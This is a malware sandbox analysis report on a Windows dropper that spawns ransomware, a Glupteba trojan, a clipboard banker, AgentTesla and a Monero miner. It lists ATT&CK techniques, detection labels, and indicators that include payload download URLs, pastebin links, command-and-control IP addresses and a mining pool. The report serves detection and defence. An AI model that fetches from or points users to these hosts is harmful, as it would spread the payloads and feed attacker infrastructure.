                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation421Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                  Default AccountsNative API1Windows Service1Access Token Manipulation1Obfuscated Files or Information2Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Scheduled Task/Job1Windows Service1Software Packing23Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Registry Run Keys / Startup Folder12Process Injection12Timestomp1NTDSSystem Information Discovery257Distributed Component Object ModelClipboard Data2Scheduled TransferNon-Standard Port11SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptScheduled Task/Job1Masquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder12Virtualization/Sandbox Evasion55Cached Domain CredentialsSecurity Software Discovery871VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol5Jamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion55Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemProcess Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Behavior Graph ID: 356507, Sample: 8TD8GfTtaW.exe, Startdate: 23/02/2021, Architecture: WINDOWS, Score: 100 (graph image and legend not reproduced in text)
                  Process relationships shown in the graph: 8TD8GfTtaW.exe starts nulhfhsi.exe and lxoqz3o0.exe; nulhfhsi.exe starts evs.exe and revs.exe; lxoqz3o0.exe starts cpu.exe and schtasks.exe; RantimeBroker.exe starts schtasks.exe and cpu.exe; evs.exe starts cmd.exe, which starts jo.exe, hello_C# (2).exe, hello_C#.exe and 2 other processes. Network endpoints shown: iplogger.org (88.99.66.31, 443), blog.agencia10x.com (104.21.67.51, 443), pastebin.com (104.23.99.190, 443), 195.2.84.91 (80), pool.minexmr.com (51.68.21.186, 4444, Stratum mining protocol detected).

                  Screenshots


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  8TD8GfTtaW.exe | 43% | Virustotal |

                  Dropped Files

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\Temp\evs.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\jo.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\evs.exe | 82% | ReversingLabs | Win32.Ransomware.LockbitCrypt
                  C:\Users\user\AppData\Local\Temp\hello_C# (2).exe | 3% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\hello_C# (2).exe | 0% | ReversingLabs |
                  C:\Users\user\AppData\Local\Temp\hello_C#.exe | 3% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\hello_C#.exe | 0% | ReversingLabs |
                  C:\Users\user\AppData\Local\Temp\jo.exe | 79% | ReversingLabs | Win32.Trojan.Glupteba
                  C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll | 3% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll | 0% | ReversingLabs |
                  C:\Users\user\AppData\Local\Temp\revs.exe | 24% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\revs.exe | 90% | ReversingLabs | ByteCode-MSIL.Trojan.ClipBanker
                  C:\Users\user\AppData\Local\lxoqz3o0.exe | 61% | ReversingLabs | Win32.Packed.Themida
                  C:\Users\user\AppData\Local\nulhfhsi.exe | 24% | Metadefender |
                  C:\Users\user\AppData\Local\nulhfhsi.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  25.0.revs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1133612
                  22.0.evs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
                  31.3.jo.exe.860000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
                  37.0.Chrome updater.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1133612
                  4.2.nulhfhsi.exe.4763110.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                  4.0.nulhfhsi.exe.3b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                  31.2.jo.exe.8b0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
                  31.2.jo.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
                  31.2.jo.exe.850e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
                  22.2.evs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
                  4.2.nulhfhsi.exe.38bd834.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                  4.2.nulhfhsi.exe.3b0000.0.unpack | 100% | Avira | TR/Dropper.Gen
                  4.1.nulhfhsi.exe.3b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                  4.2.nulhfhsi.exe.38c513c.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                  Domains

                  Source | Detection | Scanner | Label
                  blog.agencia10x.com | 11% | Virustotal |
                  api.ip.sb | 1% | Virustotal |

URLs

Several entries in this table are string-extraction artifacts rather than distinct URLs. The trailing 0, 0t, 0#, 0D on the ocsp/crl/crt/CPS entries are the DER bytes (the 0x30 SEQUENCE tag, '0', plus a length byte) that follow each IA5String URI in the signing and timestamp certificates; for example the 0x23 after SectigoRSATimeStampingCA.crt0# is the 35-byte length of the next AccessDescription, which holds http://ocsp.sectigo.com. Entries such as http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip and https://icanhazip.com5https://wtfismyip.com/textC... are adjacent strings run together; the single character between fragments is consistent with the .NET #US heap length prefix of the following string (0x35 = 53 = 26 UTF-16 characters of https://wtfismyip.com/text plus the terminal byte). The http://tempuri.org/IRemotePanel/* entries are WCF SOAP action names (tempuri.org is the default WCF contract namespace) found in nulhfhsi.exe memory, not network endpoints; the endpoints actually reached are listed under Contacted URLs below. Identical rows reported from several memory regions are listed once.

Source | Detection | Scanner | Label
http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://schemas.datacontract.org | 0% | URL Reputation | safe
http://195.2.84.91/cpu.zip | 5% | Virustotal | -
http://195.2.84.91/cpu.zip | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums | 0% | Avira URL Cloud | safe
http://87.251.71.75:32144 | 0% | Avira URL Cloud | safe
https://blog.agencia10x.com/dance.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/ | 0% | Avira URL Cloud | safe
http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip | 0% | Avira URL Cloud | safe
http://87.251.71.75:3214/ | 0% | Avira URL Cloud | safe
https://d301sr5gafysq2.cloudfront.net; | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/GetTasksResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/SendClientInfo | 0% | Avira URL Cloud | safe
https://blog.agencia10x.com | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://tempuri.org/0 | 0% | Avira URL Cloud | safe
http://195.2.84.91/nvidia.zip | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/GetSettingsResponse | 0% | Avira URL Cloud | safe
http://87.251.71.75:3214 | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/SendClientInfoResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/GetTasks | 0% | Avira URL Cloud | safe
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://blog.agencia10x.com/Done.exe | 0% | Avira URL Cloud | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
https://api.ip.sb | 0% | Avira URL Cloud | safe
http://87.251.71.75: | 0% | Avira URL Cloud | safe
http://87.251.71.75:3214t | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/CompleteTaskResponse | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://195.2.84.91/amd.zip | 0% | Avira URL Cloud | safe
https://blog.agencia10x.com4 | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://tempuri.org/IRemotePanel/Complete | 0% | Avira URL Cloud | safe
https://blog.agencia10x.com/mex.exe | 100% | Avira URL Cloud | malware
https://pastebin.com4 | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/CompleteTask | 0% | Avira URL Cloud | safe
http://tempuri.org/IRemotePanel/GetSettings | 0% | Avira URL Cloud | safe
http://blog.agencia10x.com | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ianawhois.vip.icann.org | 192.0.47.59 | true | false | - | high
bitbucket.org | 104.192.141.1 | true | false | - | high
s3-1-w.amazonaws.com | 52.217.107.52 | true | false | - | high
blog.agencia10x.com | 104.21.67.51 | true | true | - | unknown
iplogger.org | 88.99.66.31 | true | false | - | high
WHOIS.RIPE.NET | 193.0.6.135 | true | false | - | high
pool.minexmr.com | 51.68.21.186 | true | false | - | high
pastebin.com | 104.23.99.190 | true | false | - | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | - | high
api.ip.sb | unknown | unknown | true | - | unknown
whois.iana.org | unknown | unknown | false | - | high

The Malicious and Reputation columns rate the domain, not the sample's use of it. pool.minexmr.com is a public Monero mining pool and pastebin.com hosts the raw pastes the sample fetches (see the Xmrig, Stratum and pastebin signatures above); both are widely used legitimate services and therefore carry a high reputation with Malicious set to false. For this sample the stratum session to the pool and the pastebin retrieval are the behaviours to detect or block, so do not filter the Contacted Domains list on reputation alone when deriving indicators.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://195.2.84.91/cpu.zip | false | 5%, Virustotal; Avira URL Cloud: safe | unknown
http://87.251.71.75:3214/ | false | Avira URL Cloud: safe | unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabnulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                      high
                                      https://icanhazip.comnulhfhsi.exefalse
                                        high
                                        https://duckduckgo.com/ac/?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchangenulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1r2et78TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpfalse
                                            high
                                            http://ocsp.sectigo.com08TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.datacontract.orgnulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-website;nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/envelope/nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpfalse
                                                high
                                                http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enumsnulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://87.251.71.75:32144nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/soap/envelope/Dnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://blog.agencia10x.com/dance.exe8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://tempuri.org/nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipnulhfhsi.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://wtfismyip.com/textnulhfhsi.exefalse
                                                    high
                                                    https://pastebin.com/raw/WmBNYXYN8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://api.ipify.orgnulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                        high
                                                        https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/e9515cd4-e4be-nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://d301sr5gafysq2.cloudfront.net;nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://tempuri.org/IRemotePanel/GetTasksResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://tempuri.org/IRemotePanel/SendClientInfonulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.471019323.0000000003A19000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exefalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://blog.agencia10x.com8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://sectigo.com/CPS0D8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://tempuri.org/0nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://bitbucket.orgnulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://bbuseruploads.s3.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://195.2.84.91/nvidia.ziplxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://iplogger.org/1tsef7lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/IRemotePanel/GetSettingsResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://87.251.71.75:3214nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ipinfo.io/ip%appdata%nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                                        high
                                                                        https://iplogger.org/1n6Zw7powershell.exe, 00000020.00000002.502282965.0000000000B40000.00000004.00000020.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/IRemotePanel/SendClientInfoResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://bbuseruploads.s3.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/IRemotePanel/GetTasksnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dynulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.datacontract.org/2004/07/nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://blog.agencia10x.com/Done.exenulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://bitbucket.orgnulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://ocsp.thawte.com0nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exefalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://api.ip.sbnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://87.251.71.75:nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://87.251.71.75:3214tnulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  low
                                                                                  http://checkip.dyndns.orgnulhfhsi.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://tempuri.org/IRemotePanel/CompleteTaskResponsenulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchnulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://nsis.sf.net/NSIS_ErrorErrornulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drfalse
                                                                                      high
                                                                                      https://iplogger.org/1n6Zw7C:o9Ppowershell.exe, 00000020.00000002.507518014.0000000000DD0000.00000004.00000040.sdmpfalse
                                                                                        high
                                                                                        https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN&8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpfalse
                                                                                          high
                                                                                          https://iplogger.org8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://bot.whatismyipaddress.com/nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org/autocomplete?q=nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://nsis.sf.net/NSIS_Errorevs.exe, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drfalse
                                                                                                  high
                                                                                                  http://s3-1-w.amazonaws.comnulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingnulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://195.2.84.91/amd.ziplxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://blog.agencia10x.com48TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://bitbucket.org/mminminminmin05/testtest/downloads/flesh.exenulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpfalse
                                                                                                        high
http://tempuri.org/IRemotePanel/Complete | nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://blog.agencia10x.com/mex.exe | 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://pastebin.com4 | 8TD8GfTtaW.exe, 00000000.00000002.273278567.0000000003208000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRemotePanel/CompleteTask | nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468811238.0000000003805000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRemotePanel/GetSettings | nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtabt | nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp | false | | high
https://pastebin.com/raw/bnxCb5RP | 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp | false | | high
https://aui-cdn.atlassian.com | nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp | false | | high
http://blog.agencia10x.com | 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/actor/next | nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.67.51 | unknown | United States | 13335 | CLOUDFLARENETUS | true
195.2.84.91 | unknown | Russian Federation | 6903 | ZENON-ASMoscowRussiaRU | false
172.67.213.210 | unknown | United States | 13335 | CLOUDFLARENETUS | false
193.0.6.135 | unknown | Netherlands | 3333 | RIPE-NCC-ASReseauxIPEuropeensNetworkCoordinationCentre | false
52.217.107.52 | unknown | United States | 16509 | AMAZON-02US | false
51.68.21.186 | unknown | France | 16276 | OVHFR | false
104.23.99.190 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.192.141.1 | unknown | United States | 16509 | AMAZON-02US | false
88.99.66.31 | unknown | Germany | 24940 | HETZNER-ASDE | false
87.251.71.75 | unknown | Russian Federation | 49877 | RMINJINERINGRU | false
192.0.47.59 | unknown | United States | 16876 | ICANN-DCUS | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356507
Start date: 23.02.2021
Start time: 09:10:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 31s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 8TD8GfTtaW.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
